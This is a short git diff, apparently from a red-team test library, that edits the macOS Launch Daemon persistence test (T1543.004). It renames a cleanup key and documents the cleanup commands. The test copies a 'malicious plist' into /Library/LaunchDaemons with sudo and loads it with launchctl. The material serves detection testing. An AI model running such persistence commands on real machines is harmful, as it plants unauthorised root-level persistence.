@@ -41610,7 +41610,7 @@ persistence: command: | sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} - cleanup: | + cleanup_command: | sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} sudo rm /Library/LaunchDaemons/#{plist_filename} T1053.004: diff --git a/atomics/T1543.004/T1543.004.md b/atomics/T1543.004/T1543.004.md index d3aaeda3..b9992d60 100644 --- a/atomics/T1543.004/T1543.004.md +++ b/atomics/T1543.004/T1543.004.md @@ -40,6 +40,11 @@ sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename} sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename} ``` +#### Cleanup Commands: +```bash +sudo launchctl unload /Library/LaunchDaemons/#{plist_filename} +sudo rm /Library/LaunchDaemons/#{plist_filename} +```